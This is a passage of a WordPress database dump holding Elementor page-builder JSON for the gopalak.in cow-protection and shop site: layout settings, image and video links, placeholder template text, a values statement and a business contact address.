Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9084,1558,'_elementor_page_assets','a:0:{}'),(9086,1559,'_elementor_edit_mode','builder'),(9087,1559,'_elementor_template_type','wp-page'),(9088,1559,'_elementor_version','3.7.8'),(9089,1559,'_wp_page_template','elementor_canvas'),(9090,1559,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 